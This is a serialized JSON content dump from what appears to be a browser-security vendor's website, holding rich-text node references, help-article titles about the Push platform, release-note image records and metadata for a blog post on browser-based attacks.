,{},[],{"data":84088,"content":84089,"nodeType":169},{},[84090],{"data":84091,"marks":84092,"value":65418,"nodeType":173},{},[],{"data":84094,"content":84095,"nodeType":178},{},[84096,84099,84103],{"data":84097,"marks":84098,"value":65425,"nodeType":173},{},[],{"data":84100,"marks":84101,"value":65430,"nodeType":173},{},[84102],{"type":370},{"data":84104,"marks":84105,"value":65434,"nodeType":173},{},[],{"data":84107,"content":84108,"nodeType":178},{},[84109],{"data":84110,"marks":84111,"value":65441,"nodeType":173},{},[],{"data":84113,"content":84114,"nodeType":250},{},[84115,84131,84144],{"data":84116,"content":84117,"nodeType":254},{},[84118],{"data":84119,"content":84120,"nodeType":178},{},[84121,84124,84128],{"data":84122,"marks":84123,"value":65454,"nodeType":173},{},[],{"data":84125,"marks":84126,"value":19231,"nodeType":173},{},[84127],{"type":370},{"data":84129,"marks":84130,"value":65462,"nodeType":173},{},[],{"data":84132,"content":84133,"nodeType":254},{},[84134],{"data":84135,"content":84136,"nodeType":178},{},[84137,84140],{"data":84138,"marks":84139,"value":65472,"nodeType":173},{},[],{"data":84141,"marks":84142,"value":18649,"nodeType":173},{},[84143],{"type":370},{"data":84145,"content":84146,"nodeType":254},{},[84147],{"data":84148,"content":84149,"nodeType":178},{},[84150],{"data":84151,"marks":84152,"value":65486,"nodeType":173},{},[],{"data":84154,"content":84157,"nodeType":312},{"target":84155},{"sys":84156},{"id":65491,"type":317,"linkType":318},[],{"data":84159,"content":84160,"nodeType":169},{},[84161],{"data":84162,"marks":84163,"value":65129,"nodeType":173},{},[],{"data":84165,"content":84166,"nodeType":178},{},[84167],{"data":84168,"marks":84169,"value":65505,"nodeType":173},{},[],{"data":84171,"content":84172,"nodeType":178},{},[84173,84176,84180],{"data":84174,"marks":84175,"value":65512,"nodeType":173},{},[],{"data":84177,"marks":84178,"value":65517,"nodeType":173},{},[84179],{"type":370},{"data":84181,"marks":84182,"value":65521,"nodeType":173},{},[],{"data":84184,"content":84185,"nodeType":178},{},[84186,84189,84197],{"data":84187,"marks":84188,"value":37,"nodeType":173},{},[],{"data":84190,"content":84193,"nodeType":1698},{"target":84191},{"sys":84192},{"id":65532,"type":317,"linkType":318},[84194],{"data":84195,"marks":84196,"value":18605,"nodeType":173},{},[],{"data":84198,"marks":84199,"value":37,"nodeType":173},{},[],{"data":84201,"content":84202,"nodeType":169},{},[84203],{"data":84204,"marks":84205,"value":65546,"nodeType":173},{},[],{"data":84207,"content":84208,"nodeType":178},{},[84209],{"data":84210,"marks":84211,"value":65553,"nodeType":173},{},[],{"data":84213,"content":84214,"nodeType":178},{},[84215,84218,84222,84225,84229],{"data":84216,"marks":84217,"value":65560,"nodeType":173},{},[],{"data":84219,"marks":84220,"value":65565,"nodeType":173},{},[84221],{"type":370},{"data":84223,"marks":84224,"value":1464,"nodeType":173},{},[],{"data":84226,"marks":84227,"value":65573,"nodeType":173},{},[84228],{"type":370},{"data":84230,"marks":84231,"value":1477,"nodeType":173},{},[],{"data":84233,"content":84234,"nodeType":178},{},[84235,84238,84246],{"data":84236,"marks":84237,"value":37,"nodeType":173},{},[],{"data":84239,"content":84242,"nodeType":1698},{"target":84240},{"sys":84241},{"id":65587,"type":317,"linkType":318},[84243],{"data":84244,"marks":84245,"value":18605,"nodeType":173},{},[],{"data":84247,"marks":84248,"value":37,"nodeType":173},{},[],{"entries":84250},{"inline":84251,"hyperlink":84252,"block":84272},[],[84253,84255,84257,84262,84267],{"sys":84254,"__typename":1528,"title":46296,"slug":46297},{"id":24428},{"sys":84256,"__typename":6655,"title":6661,"slug":6662,"articleId":6663},{"id":2171},{"sys":84258,"__typename":6655,"title":84259,"slug":84260,"articleId":84261},{"id":65404},"Can Push identify when employees are syncing browser profile data?","can-push-identify-when-employees-are-syncing-browser-profile-data",10134,{"sys":84263,"__typename":6655,"title":84264,"slug":84265,"articleId":84266},{"id":65532},"What is the data retention period for employee activity in the Push platform?","what-is-the-data-retention-period-for-employee-activity-in-the-push-platform",10132,{"sys":84268,"__typename":6655,"title":84269,"slug":84270,"articleId":84271},{"id":65587},"How do I fix a webhook that was disabled?","how-do-i-fix-a-webhook-that-was-disabled",10101,[84273,84279,84286],{"sys":84274,"__typename":5345,"title":84275,"caption":118,"layoutMode":118,"file":84276},{"id":65253},"Detections page - timeline - for release notes - Sept. 2025",{"url":84277,"width":46375,"height":84278},"https://images.ctfassets.net/y1cdw1ablpvd/32lmGPXFmhpt8ULInS2zjx/b542d8844172c9f11b29e6b98f6dbef7/detection_enrichment_example.png",878,{"sys":84280,"__typename":5345,"title":84281,"caption":118,"layoutMode":118,"file":84282},{"id":65331},"Cloned login block page - for release notes - Sept. 2025",{"url":84283,"width":84284,"height":84285},"https://images.ctfassets.net/y1cdw1ablpvd/625lJ4LCfSYHDJJSsjJIhf/8f9cf4e950c9e274e2002dcf9e1c07ff/cloned_login_block_page_example.png",2450,732,{"sys":84287,"__typename":5345,"title":84288,"caption":118,"layoutMode":118,"file":84289},{"id":65491},"Dashboard - for release notes - Sept. 2025",{"url":84290,"width":84291,"height":84292},"https://images.ctfassets.net/y1cdw1ablpvd/2Ma6lXVOoWM2SJt4EkJZon/640f9587bb8529fe7c2cf4255c29d876/push_dashboard_20250827.png",1523,853,"content:blog:product-release-september-2025.json","blog/product-release-september-2025.json","blog/product-release-september-2025",{"_path":84297,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":84298,"summary":84300,"title":60690,"subtitle":118,"metaTitle":84311,"synopsis":60691,"hashTags":118,"publishedDate":60692,"slug":60693,"ogImage":84312,"tagsCollection":84314,"relatedBlogPostsCollection":84320,"authorsCollection":86389,"content":86393,"_id":86986,"_type":5439,"_source":5440,"_file":86987,"_stem":86988,"_extension":5439},"/blog/6-browser-based-attacks-every-security-team-should-be-prepared-for",{"id":60053,"publishedAt":84299},"2026-01-30T18:21:13.262Z",{"json":84301},{"data":84302,"content":84303,"nodeType":165},{},[84304],{"data":84305,"content":84306,"nodeType":178},{},[84307],{"data":84308,"marks":84309,"value":84310,"nodeType":173},{},[],"What security teams need to know about the browser-based attack techniques that are the leading cause of breaches today.","6 browser-based attacks security teams need to know about",{"url":84313},"https://images.ctfassets.net/y1cdw1ablpvd/42Id6vr4wOWFp4RH6MqFoJ/54bfaf4a392fcbeda9bf795b09a9bef3/Bleeping_Thumbnail__Article_Header_.png",{"items":84315},[84316,84318],{"sys":84317,"name":505},{"id":504},{"sys":84319,"name":509},{"id":508},{"items":84321},[84322,85182,85704],{"__typename":1528,"sys":84323,"content":84324,"title":46296,"synopsis":82273,"hashTags":118,"publishedDate":82274,"slug":46297,"tagsCollection":85172,"authorsCollection":85178},{"id":24428},{"json":84325},{"nodeType":165,"data":84326,"content":84327},{},[84328,84334,84344,84354,84364,84374,84379,84395,84401,84414,84420,84425,84428,84435,84441,84447,84453,84458,84461,84468,84474,84490,84496,84502,84508,84514,84519,84525,84531,84537,84562,84568,84584,84590,84596,84612,84628,84644,84649,84655,84668,84674,84680,84686,84702,84709,84715,84721,84724,84731,84737,84743,84749,84788,84793,84799,84812,84889,84894,84900,84906,84963,84969,84975,84981,84986,84992,84998,85004,85009,85015,85021,85027,85032,85048,85054,85060,85099,85104,85107,85114,85134,85137,85144,85150,85156],{"nodeType":178,"data":84329,"content":84330},{},[84331],{"nodeType":173,"value":81303,"marks":84332,"data":84333},[],{},{"nodeType":178,"data":84335,"content":84336},{},[84337,84341],{"nodeType":173,"value":81310,"marks":84338,"data":84340},[84339],{"type":370},{},{"nodeType":173,"value":81315,"marks":84342,"data":84343},[],{},{"nodeType":178,"data":84345,"content":84346},{},[84347,84351],{"nodeType":173,"value":81322,"marks":84348,"data":84350},[84349],{"type":370},{},{"nodeType":173,"value":81327,"marks":84352,"data":84353},[],{},{"nodeType":178,"data":84355,"content":84356},{},[84357,84361],{"nodeType":173,"value":81334,"marks":84358,"data":84360},[84359],{"type":370},{},{"nodeType":173,"value":81339,"marks":84362,"data":84363},[],{},{"nodeType":178,"data":84365,"content":84366},{},[84367,84371],{"nodeType":173,"value":81346,"marks":84368,"data":84370},[84369],{"type":370},{},{"nodeType":173,"value":81351,"marks":84372,"data":84373},[],{},{"nodeType":312,"data":84375,"content":84378},{"target":84376},{"sys":84377},{"id":81358,"type":317,"linkType":318},[],{"nodeType":178,"data":84380,"content":84381},{},[84382,84385,84392],{"nodeType":173,"value":81364,"marks":84383,"data":84384},[],{},{"nodeType":186,"data":84386,"content":84387},{"uri":63182},[84388],{"nodeType":173,"value":81371,"marks":84389,"data":84391},[84390],{"type":194},{},{"nodeType":173,"value":81376,"marks":84393,"data":84394},[],{},{"nodeType":178,"data":84396,"content":84397},{},[84398],{"nodeType":173,"value":81383,"marks":84399,"data":84400},[],{},{"nodeType":178,"data":84402,"content":84403},{},[84404,84407,84411],{"nodeType":173,"value":81390,"marks":84405,"data":84406},[],{},{"nodeType":173,"value":19231,"marks":84408,"data":84410},[84409],{"type":370},{},{"nodeType":173,"value":81398,"marks":84412,"data":84413},[],{},{"nodeType":178,"data":84415,"content":84416},{},[84417],{"nodeType":173,"value":81405,"marks":84418,"data":84419},[],{},{"nodeType":312,"data":84421,"content":84424},{"target":84422},{"sys":84423},{"id":81412,"type":317,"linkType":318},[],{"nodeType":231,"data":84426,"content":84427},{},[],{"nodeType":169,"data":84429,"content":84430},{},[84431],{"nodeType":173,"value":81421,"marks":84432,"data":84434},[84433],{"type":370},{},{"nodeType":178,"data":84436,"content":84437},{},[84438],{"nodeType":173,"value":81429,"marks":84439,"data":84440},[],{},{"nodeType":178,"data":84442,"content":84443},{},[84444],{"nodeType":173,"value":81436,"marks":84445,"data":84446},[],{},{"nodeType":178,"data":84448,"content":84449},{},[84450],{"nodeType":173,"value":81443,"marks":84451,"data":84452},[],{},{"nodeType":312,"data":84454,"content":84457},{"target":84455},{"sys":84456},{"id":81450,"type":317,"linkType":318},[],{"nodeType":231,"data":84459,"content":84460},{},[],{"nodeType":169,"data":84462,"content":84463},{},[84464],{"nodeType":173,"value":81459,"marks":84465,"data":84467},[84466],{"type":370},{},{"nodeType":178,"data":84469,"content":84470},{},[84471],{"nodeType":173,"value":81467,"marks":84472,"data":84473},[],{},{"nodeType":178,"data":84475,"content":84476},{},[84477,84480,84487],{"nodeType":173,"value":81474,"marks":84478,"data":84479},[],{},{"nodeType":186,"data":84481,"content":84482},{"uri":77262},[84483],{"nodeType":173,"value":81481,"marks":84484,"data":84486},[84485],{"type":194},{},{"nodeType":173,"value":81486,"marks":84488,"data":84489},[],{},{"nodeType":178,"data":84491,"content":84492},{},[84493],{"nodeType":173,"value":81493,"marks":84494,"data":84495},[],{},{"nodeType":178,"data":84497,"content":84498},{},[84499],{"nodeType":173,"value":81500,"marks":84500,"data":84501},[],{},{"nodeType":235,"data":84503,"content":84504},{},[84505],{"nodeType":173,"value":81507,"marks":84506,"data":84507},[],{},{"nodeType":178,"data":84509,"content":84510},{},[84511],{"nodeType":173,"value":81514,"marks":84512,"data":84513},[],{},{"nodeType":312,"data":84515,"content":84518},{"target":84516},{"sys":84517},{"id":81521,"type":317,"linkType":318},[],{"nodeType":178,"data":84520,"content":84521},{},[84522],{"nodeType":173,"value":81527,"marks":84523,"data":84524},[],{},{"nodeType":235,"data":84526,"content":84527},{},[84528],{"nodeType":173,"value":81534,"marks":84529,"data":84530},[],{},{"nodeType":178,"data":84532,"content":84533},{},[84534],{"nodeType":173,"value":81541,"marks":84535,"data":84536},[],{},{"nodeType":178,"data":84538,"content":84539},{},[84540,84543,84551,84555,84558],{"nodeType":173,"value":81548,"marks":84541,"data":84542},[],{},{"nodeType":186,"data":84544,"content":84545},{"uri":81553},[84546],{"nodeType":173,"value":81556,"marks":84547,"data":84550},[84548,84549],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":84552,"data":84554},[84553],{"type":370},{},{"nodeType":173,"value":81566,"marks":84556,"data":84557},[],{},{"nodeType":173,"value":73803,"marks":84559,"data":84561},[84560],{"type":370},{},{"nodeType":178,"data":84563,"content":84564},{},[84565],{"nodeType":173,"value":81577,"marks":84566,"data":84567},[],{},{"nodeType":178,"data":84569,"content":84570},{},[84571,84574,84581],{"nodeType":173,"value":81584,"marks":84572,"data":84573},[],{},{"nodeType":186,"data":84575,"content":84576},{"uri":63182},[84577],{"nodeType":173,"value":25071,"marks":84578,"data":84580},[84579],{"type":194},{},{"nodeType":173,"value":81595,"marks":84582,"data":84583},[],{},{"nodeType":235,"data":84585,"content":84586},{},[84587],{"nodeType":173,"value":81602,"marks":84588,"data":84589},[],{},{"nodeType":178,"data":84591,"content":84592},{},[84593],{"nodeType":173,"value":81609,"marks":84594,"data":84595},[],{},{"nodeType":178,"data":84597,"content":84598},{},[84599,84602,84609],{"nodeType":173,"value":81616,"marks":84600,"data":84601},[],{},{"nodeType":186,"data":84603,"content":84604},{"uri":81621},[84605],{"nodeType":173,"value":81624,"marks":84606,"data":84608},[84607],{"type":194},{},{"nodeType":173,"value":81629,"marks":84610,"data":84611},[],{},{"nodeType":178,"data":84613,"content":84614},{},[84615,84618,84625],{"nodeType":173,"value":81636,"marks":84616,"data":84617},[],{},{"nodeType":186,"data":84619,"content":84620},{"uri":81641},[84621],{"nodeType":173,"value":81644,"marks":84622,"data":84624},[84623],{"type":194},{},{"nodeType":173,"value":81649,"marks":84626,"data":84627},[],{},{"nodeType":178,"data":84629,"content":84630},{},[84631,84634,84641],{"nodeType":173,"value":81656,"marks":84632,"data":84633},[],{},{"nodeType":186,"data":84635,"content":84636},{"uri":75099},[84637],{"nodeType":173,"value":81663,"marks":84638,"data":84640},[84639],{"type":194},{},{"nodeType":173,"value":81668,"marks":84642,"data":84643},[],{},{"nodeType":312,"data":84645,"content":84648},{"target":84646},{"sys":84647},{"id":81675,"type":317,"linkType":318},[],{"nodeType":235,"data":84650,"content":84651},{},[84652],{"nodeType":173,"value":81681,"marks":84653,"data":84654},[],{},{"nodeType":178,"data":84656,"content":84657},{},[84658,84661,84665],{"nodeType":173,"value":81688,"marks":84659,"data":84660},[],{},{"nodeType":173,"value":81692,"marks":84662,"data":84664},[84663],{"type":1646},{},{"nodeType":173,"value":81697,"marks":84666,"data":84667},[],{},{"nodeType":178,"data":84669,"content":84670},{},[84671],{"nodeType":173,"value":81704,"marks":84672,"data":84673},[],{},{"nodeType":178,"data":84675,"content":84676},{},[84677],{"nodeType":173,"value":81711,"marks":84678,"data":84679},[],{},{"nodeType":178,"data":84681,"content":84682},{},[84683],{"nodeType":173,"value":81718,"marks":84684,"data":84685},[],{},{"nodeType":178,"data":84687,"content":84688},{},[84689,84692,84699],{"nodeType":173,"value":81725,"marks":84690,"data":84691},[],{},{"nodeType":186,"data":84693,"content":84694},{"uri":832},[84695],{"nodeType":173,"value":81732,"marks":84696,"data":84698},[84697],{"type":194},{},{"nodeType":173,"value":81737,"marks":84700,"data":84701},[],{},{"nodeType":178,"data":84703,"content":84704},{},[84705],{"nodeType":173,"value":81744,"marks":84706,"data":84708},[84707],{"type":370},{},{"nodeType":178,"data":84710,"content":84711},{},[84712],{"nodeType":173,"value":81752,"marks":84713,"data":84714},[],{},{"nodeType":178,"data":84716,"content":84717},{},[84718],{"nodeType":173,"value":81759,"marks":84719,"data":84720},[],{},{"nodeType":231,"data":84722,"content":84723},{},[],{"nodeType":169,"data":84725,"content":84726},{},[84727],{"nodeType":173,"value":81769,"marks":84728,"data":84730},[84729],{"type":370},{},{"nodeType":178,"data":84732,"content":84733},{},[84734],{"nodeType":173,"value":81777,"marks":84735,"data":84736},[],{},{"nodeType":178,"data":84738,"content":84739},{},[84740],{"nodeType":173,"value":81784,"marks":84741,"data":84742},[],{},{"nodeType":178,"data":84744,"content":84745},{},[84746],{"nodeType":173,"value":81791,"marks":84747,"data":84748},[],{},{"nodeType":250,"data":84750,"content":84751},{},[84752,84761,84770,84779],{"nodeType":254,"data":84753,"content":84754},{},[84755],{"nodeType":178,"data":84756,"content":84757},{},[84758],{"nodeType":173,"value":81804,"marks":84759,"data":84760},[],{},{"nodeType":254,"data":84762,"content":84763},{},[84764],{"nodeType":178,"data":84765,"content":84766},{},[84767],{"nodeType":173,"value":81814,"marks":84768,"data":84769},[],{},{"nodeType":254,"data":84771,"content":84772},{},[84773],{"nodeType":178,"data":84774,"content":84775},{},[84776],{"nodeType":173,"value":81824,"marks":84777,"data":84778},[],{},{"nodeType":254,"data":84780,"content":84781},{},[84782],{"nodeType":178,"data":84783,"content":84784},{},[84785],{"nodeType":173,"value":81834,"marks":84786,"data":84787},[],{},{"nodeType":312,"data":84789,"content":84792},{"target":84790},{"sys":84791},{"id":81841,"type":317,"linkType":318},[],{"nodeType":178,"data":84794,"content":84795},{},[84796],{"nodeType":173,"value":81847,"marks":84797,"data":84798},[],{},{"nodeType":178,"data":84800,"content":84801},{},[84802,84805,84809],{"nodeType":173,"value":81854,"marks":84803,"data":84804},[],{},{"nodeType":173,"value":19231,"marks":84806,"data":84808},[84807],{"type":370},{},{"nodeType":173,"value":81862,"marks":84810,"data":84811},[],{},{"nodeType":250,"data":84813,"content":84814},{},[84815,84844,84853,84862,84871,84880],{"nodeType":254,"data":84816,"content":84817},{},[84818],{"nodeType":178,"data":84819,"content":84820},{},[84821,84824,84831,84834,84841],{"nodeType":173,"value":81875,"marks":84822,"data":84823},[],{},{"nodeType":186,"data":84825,"content":84826},{"uri":81880},[84827],{"nodeType":173,"value":81883,"marks":84828,"data":84830},[84829],{"type":194},{},{"nodeType":173,"value":81888,"marks":84832,"data":84833},[],{},{"nodeType":186,"data":84835,"content":84836},{"uri":81893},[84837],{"nodeType":173,"value":81896,"marks":84838,"data":84840},[84839],{"type":194},{},{"nodeType":173,"value":81901,"marks":84842,"data":84843},[],{},{"nodeType":254,"data":84845,"content":84846},{},[84847],{"nodeType":178,"data":84848,"content":84849},{},[84850],{"nodeType":173,"value":81911,"marks":84851,"data":84852},[],{},{"nodeType":254,"data":84854,"content":84855},{},[84856],{"nodeType":178,"data":84857,"content":84858},{},[84859],{"nodeType":173,"value":81921,"marks":84860,"data":84861},[],{},{"nodeType":254,"data":84863,"content":84864},{},[84865],{"nodeType":178,"data":84866,"content":84867},{},[84868],{"nodeType":173,"value":81931,"marks":84869,"data":84870},[],{},{"nodeType":254,"data":84872,"content":84873},{},[84874],{"nodeType":178,"data":84875,"content":84876},{},[84877],{"nodeType":173,"value":81941,"marks":84878,"data":84879},[],{},{"nodeType":254,"data":84881,"content":84882},{},[84883],{"nodeType":178,"data":84884,"content":84885},{},[84886],{"nodeType":173,"value":81951,"marks":84887,"data":84888},[],{},{"nodeType":312,"data":84890,"content":84893},{"target":84891},{"sys":84892},{"id":81958,"type":317,"linkType":318},[],{"nodeType":235,"data":84895,"content":84896},{},[84897],{"nodeType":173,"value":81964,"marks":84898,"data":84899},[],{},{"nodeType":178,"data":84901,"content":84902},{},[84903],{"nodeType":173,"value":81971,"marks":84904,"data":84905},[],{},{"nodeType":250,"data":84907,"content":84908},{},[84909,84918,84927,84936,84945,84954],{"nodeType":254,"data":84910,"content":84911},{},[84912],{"nodeType":178,"data":84913,"content":84914},{},[84915],{"nodeType":173,"value":81984,"marks":84916,"data":84917},[],{},{"nodeType":254,"data":84919,"content":84920},{},[84921],{"nodeType":178,"data":84922,"content":84923},{},[84924],{"nodeType":173,"value":81994,"marks":84925,"data":84926},[],{},{"nodeType":254,"data":84928,"content":84929},{},[84930],{"nodeType":178,"data":84931,"content":84932},{},[84933],{"nodeType":173,"value":82004,"marks":84934,"data":84935},[],{},{"nodeType":254,"data":84937,"content":84938},{},[84939],{"nodeType":178,"data":84940,"content":84941},{},[84942],{"nodeType":173,"value":82014,"marks":84943,"data":84944},[],{},{"nodeType":254,"data":84946,"content":84947},{},[84948],{"nodeType":178,"data":84949,"content":84950},{},[84951],{"nodeType":173,"value":82024,"marks":84952,"data":84953},[],{},{"nodeType":254,"data":84955,"content":84956},{},[84957],{"nodeType":178,"data":84958,"content":84959},{},[84960],{"nodeType":173,"value":82034,"marks":84961,"data":84962},[],{},{"nodeType":178,"data":84964,"content":84965},{},[84966],{"nodeType":173,"value":82041,"marks":84967,"data":84968},[],{},{"nodeType":178,"data":84970,"content":84971},{},[84972],{"nodeType":173,"value":82048,"marks":84973,"data":84974},[],{},{"nodeType":178,"data":84976,"content":84977},{},[84978],{"nodeType":173,"value":82055,"marks":84979,"data":84980},[],{},{"nodeType":312,"data":84982,"content":84985},{"target":84983},{"sys":84984},{"id":82062,"type":317,"linkType":318},[],{"nodeType":178,"data":84987,"content":84988},{},[84989],{"nodeType":173,"value":82068,"marks":84990,"data":84991},[],{},{"nodeType":235,"data":84993,"content":84994},{},[84995],{"nodeType":173,"value":82075,"marks":84996,"data":84997},[],{},{"nodeType":178,"data":84999,"content":85000},{},[85001],{"nodeType":173,"value":82082,"marks":85002,"data":85003},[],{},{"nodeType":312,"data":85005,"content":85008},{"target":85006},{"sys":85007},{"id":82089,"type":317,"linkType":318},[],{"nodeType":235,"data":85010,"content":85011},{},[85012],{"nodeType":173,"value":82095,"marks":85013,"data":85014},[],{},{"nodeType":178,"data":85016,"content":85017},{},[85018],{"nodeType":173,"value":82102,"marks":85019,"data":85020},[],{},{"nodeType":178,"data":85022,"content":85023},{},[85024],{"nodeType":173,"value":82109,"marks":85025,"data":85026},[],{},{"nodeType":312,"data":85028,"content":85031},{"target":85029},{"sys":85030},{"id":82116,"type":317,"linkType":318},[],{"nodeType":178,"data":85033,"content":85034},{},[85035,85038,85045],{"nodeType":173,"value":82122,"marks":85036,"data":85037},[],{},{"nodeType":186,"data":85039,"content":85040},{"uri":74370},[85041],{"nodeType":173,"value":82129,"marks":85042,"data":85044},[85043],{"type":194},{},{"nodeType":173,"value":82134,"marks":85046,"data":85047},[],{},{"nodeType":235,"data":85049,"content":85050},{},[85051],{"nodeType":173,"value":82141,"marks":85052,"data":85053},[],{},{"nodeType":178,"data":85055,"content":85056},{},[85057],{"nodeType":173,"value":82148,"marks":85058,"data":85059},[],{},{"nodeType":250,"data":85061,"content":85062},{},[85063,85072,85081,85090],{"nodeType":254,"data":85064,"content":85065},{},[85066],{"nodeType":178,"data":85067,"content":85068},{},[85069],{"nodeType":173,"value":82161,"marks":85070,"data":85071},[],{},{"nodeType":254,"data":85073,"content":85074},{},[85075],{"nodeType":178,"data":85076,"content":85077},{},[85078],{"nodeType":173,"value":82171,"marks":85079,"data":85080},[],{},{"nodeType":254,"data":85082,"content":85083},{},[85084],{"nodeType":178,"data":85085,"content":85086},{},[85087],{"nodeType":173,"value":82181,"marks":85088,"data":85089},[],{},{"nodeType":254,"data":85091,"content":85092},{},[85093],{"nodeType":178,"data":85094,"content":85095},{},[85096],{"nodeType":173,"value":82191,"marks":85097,"data":85098},[],{},{"nodeType":312,"data":85100,"content":85103},{"target":85101},{"sys":85102},{"id":82198,"type":317,"linkType":318},[],{"nodeType":231,"data":85105,"content":85106},{},[],{"nodeType":169,"data":85108,"content":85109},{},[85110],{"nodeType":173,"value":82207,"marks":85111,"data":85113},[85112],{"type":370},{},{"nodeType":178,"data":85115,"content":85116},{},[85117,85120,85127,85130],{"nodeType":173,"value":82215,"marks":85118,"data":85119},[],{},{"nodeType":186,"data":85121,"content":85122},{"uri":82220},[85123],{"nodeType":173,"value":82223,"marks":85124,"data":85126},[85125],{"type":194},{},{"nodeType":173,"value":2936,"marks":85128,"data":85129},[],{},{"nodeType":173,"value":82231,"marks":85131,"data":85133},[85132],{"type":370},{},{"nodeType":231,"data":85135,"content":85136},{},[],{"nodeType":169,"data":85138,"content":85139},{},[85140],{"nodeType":173,"value":2824,"marks":85141,"data":85143},[85142],{"type":370},{},{"nodeType":178,"data":85145,"content":85146},{},[85147],{"nodeType":173,"value":70343,"marks":85148,"data":85149},[],{},{"nodeType":178,"data":85151,"content":85152},{},[85153],{"nodeType":173,"value":70350,"marks":85154,"data":85155},[],{},{"nodeType":178,"data":85157,"content":85158},{},[85159,85162,85169],{"nodeType":173,"value":61741,"marks":85160,"data":85161},[],{},{"nodeType":186,"data":85163,"content":85164},{"uri":473},[85165],{"nodeType":173,"value":70364,"marks":85166,"data":85168},[85167],{"type":194},{},{"nodeType":173,"value":37,"marks":85170,"data":85171},[],{},{"items":85173},[85174,85176],{"sys":85175,"name":509},{"id":508},{"sys":85177,"name":505},{"id":504},{"items":85179},[85180],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":85181},{"url":2911},{"__typename":1528,"sys":85183,"content":85184,"title":70368,"synopsis":70369,"hashTags":118,"publishedDate":70370,"slug":70371,"tagsCollection":85694,"authorsCollection":85700},{"id":69777},{"json":85185},{"data":85186,"content":85187,"nodeType":165},{},[85188,85194,85200,85216,85222,85238,85244,85247,85254,85260,85266,85271,85277,85317,85353,85360,85366,85382,85412,85417,85423,85428,85434,85441,85467,85472,85475,85482,85498,85514,85540,85545,85548,85555,85561,85641,85644,85651,85666,85672,85678],{"data":85189,"content":85190,"nodeType":178},{},[85191],{"data":85192,"marks":85193,"value":69788,"nodeType":173},{},[],{"data":85195,"content":85196,"nodeType":178},{},[85197],{"data":85198,"marks":85199,"value":69795,"nodeType":173},{},[],{"data":85201,"content":85202,"nodeType":178},{},[85203,85206,85213],{"data":85204,"marks":85205,"value":69802,"nodeType":173},{},[],{"data":85207,"content":85208,"nodeType":186},{"uri":69805},[85209],{"data":85210,"marks":85211,"value":69811,"nodeType":173},{},[85212],{"type":194},{"data":85214,"marks":85215,"value":69815,"nodeType":173},{},[],{"data":85217,"content":85218,"nodeType":178},{},[85219],{"data":85220,"marks":85221,"value":69822,"nodeType":173},{},[],{"data":85223,"content":85224,"nodeType":178},{},[85225,85228,85235],{"data":85226,"marks":85227,"value":69829,"nodeType":173},{},[],{"data":85229,"content":85230,"nodeType":186},{"uri":59420},[85231],{"data":85232,"marks":85233,"value":69837,"nodeType":173},{},[85234],{"type":194},{"data":85236,"marks":85237,"value":69841,"nodeType":173},{},[],{"data":85239,"content":85240,"nodeType":178},{},[85241],{"data":85242,"marks":85243,"value":69848,"nodeType":173},{},[],{"data":85245,"content":85246,"nodeType":231},{},[],{"data":85248,"content":85249,"nodeType":169},{},[85250],{"data":85251,"marks":85252,"value":69859,"nodeType":173},{},[85253],{"type":370},{"data":85255,"content":85256,"nodeType":178},{},[85257],{"data":85258,"marks":85259,"value":69866,"nodeType":173},{},[],{"data":85261,"content":85262,"nodeType":178},{},[85263],{"data":85264,"marks":85265,"value":69873,"nodeType":173},{},[],{"data":85267,"content":85270,"nodeType":312},{"target":85268},{"sys":85269},{"id":69878,"type":317,"linkType":318},[],{"data":85272,"content":85273,"nodeType":178},{},[85274],{"data":85275,"marks":85276,"value":69886,"nodeType":173},{},[],{"data":85278,"content":85279,"nodeType":250},{},[85280,85289,85308],{"data":85281,"content":85282,"nodeType":254},{},[85283],{"data":85284,"content":85285,"nodeType":178},{},[85286],{"data":85287,"marks":85288,"value":69899,"nodeType":173},{},[],{"data":85290,"content":85291,"nodeType":254},{},[85292],{"data":85293,"content":85294,"nodeType":178},{},[85295,85298,85305],{"data":85296,"marks":85297,"value":69909,"nodeType":173},{},[],{"data":85299,"content":85300,"nodeType":186},{"uri":69912},[85301],{"data":85302,"marks":85303,"value":8046,"nodeType":173},{},[85304],{"type":194},{"data":85306,"marks":85307,"value":69921,"nodeType":173},{},[],{"data":85309,"content":85310,"nodeType":254},{},[85311],{"data":85312,"content":85313,"nodeType":178},{},[85314],{"data":85315,"marks":85316,"value":69931,"nodeType":173},{},[],{"data":85318,"content":85319,"nodeType":178},{},[85320,85323,85330,85333,85340,85343,85350],{"data":85321,"marks":85322,"value":69938,"nodeType":173},{},[],{"data":85324,"content":85325,"nodeType":186},{"uri":69941},[85326],{"data":85327,"marks":85328,"value":69947,"nodeType":173},{},[85329],{"type":194},{"data":85331,"marks":85332,"value":69951,"nodeType":173},{},[],{"data":85334,"content":85335,"nodeType":186},{"uri":69941},[85336],{"data":85337,"marks":85338,"value":69947,"nodeType":173},{},[85339],{"type":194},{"data":85341,"marks":85342,"value":69962,"nodeType":173},{},[],{"data":85344,"content":85345,"nodeType":186},{"uri":69941},[85346],{"data":85347,"marks":85348,"value":69947,"nodeType":173},{},[85349],{"type":194},{"data":85351,"marks":85352,"value":69973,"nodeType":173},{},[],{"data":85354,"content":85355,"nodeType":235},{},[85356],{"data":85357,"marks":85358,"value":69981,"nodeType":173},{},[85359],{"type":370},{"data":85361,"content":85362,"nodeType":178},{},[85363],{"data":85364,"marks":85365,"value":69988,"nodeType":173},{},[],{"data":85367,"content":85368,"nodeType":178},{},[85369,85372,85379],{"data":85370,"marks":85371,"value":69995,"nodeType":173},{},[],{"data":85373,"content":85374,"nodeType":186},{"uri":69998},[85375],{"data":85376,"marks":85377,"value":70004,"nodeType":173},{},[85378],{"type":194},{"data":85380,"marks":85381,"value":70008,"nodeType":173},{},[],{"data":85383,"content":85384,"nodeType":178},{},[85385,85388,85395,85398,85405,85408],{"data":85386,"marks":85387,"value":70015,"nodeType":173},{},[],{"data":85389,"content":85390,"nodeType":186},{"uri":63250},[85391],{"data":85392,"marks":85393,"value":63256,"nodeType":173},{},[85394],{"type":194},{"data":85396,"marks":85397,"value":70026,"nodeType":173},{},[],{"data":85399,"content":85400,"nodeType":186},{"uri":70029},[85401],{"data":85402,"marks":85403,"value":70035,"nodeType":173},{},[85404],{"type":194},{"data":85406,"marks":85407,"value":70039,"nodeType":173},{},[],{"data":85409,"marks":85410,"value":70044,"nodeType":173},{},[85411],{"type":370},{"data":85413,"content":85416,"nodeType":312},{"target":85414},{"sys":85415},{"id":70049,"type":317,"linkType":318},[],{"data":85418,"content":85419,"nodeType":178},{},[85420],{"data":85421,"marks":85422,"value":70057,"nodeType":173},{},[],{"data":8542